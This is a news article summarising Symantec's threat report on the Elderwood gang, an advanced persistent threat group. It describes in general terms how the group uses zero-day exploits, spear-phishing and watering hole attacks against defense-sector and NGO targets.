‘Elderwood’ comes from a source code variable used by the attackers. Symantec uses the name to describe both the gang and the attack infrastructure it uses. Aurora became known as the attack that coined a new phrase: advanced persistent threat, or APT. The continuing activity of the Elderwood gang shows what typifies if not defines the advanced persistent threat.
The gang is technically accomplished and well-resourced. It seems able to get hold of an unlimited number of zero-day vulnerabilities, is accomplished at targeted social engineering, knows precisely what it is looking for, and is patient in achieving those ends. “The targeted industry sectors,” notes Symantec, “include, but are not restricted to; defense, various defense supply chain manufacturers, human rights and non-governmental organizations (NGOs), and IT service providers.”
The traditional attacks are launched through targeted spear-phishing, either through an email with an attached infected file, or by tricking the target into visiting an infected website. More recently Symantec has noted an increased use of the watering hole technique – so named after predators who wait at a watering hole for their targets to visit. If you know the interests of your target – which can be easily gained from social networking sites, then you know what types of sites are likely to be visited. “For example,” says Symantec, “people who visit the Amnesty International Hong Kong website are most likely visiting because they are interested in human rights issues in Hong Kong.”
Having identified likely watering holes, the Elderwood gang hacks into the relevant website and injects an exploit to infect the target next time he or she visits. “Three of the most recent zero-day exploits were used in watering hole attacks, an indication that this approach is gaining momentum,” says the company.
The gang, adds Symantec, “is focused on wholesale theft of intellectual property and clearly has the resources, in terms of manpower, funding, and technical skills, required to implement this task.” A high proportion of these targets seem to be in the US defense industry. Symantec suggests that a new round of Elderwood attacks can be expected in early 2013, and particularly warns that subsidiaries and business partners in the supply chain may be targeted first, and then used as a stepping stone up to the main target.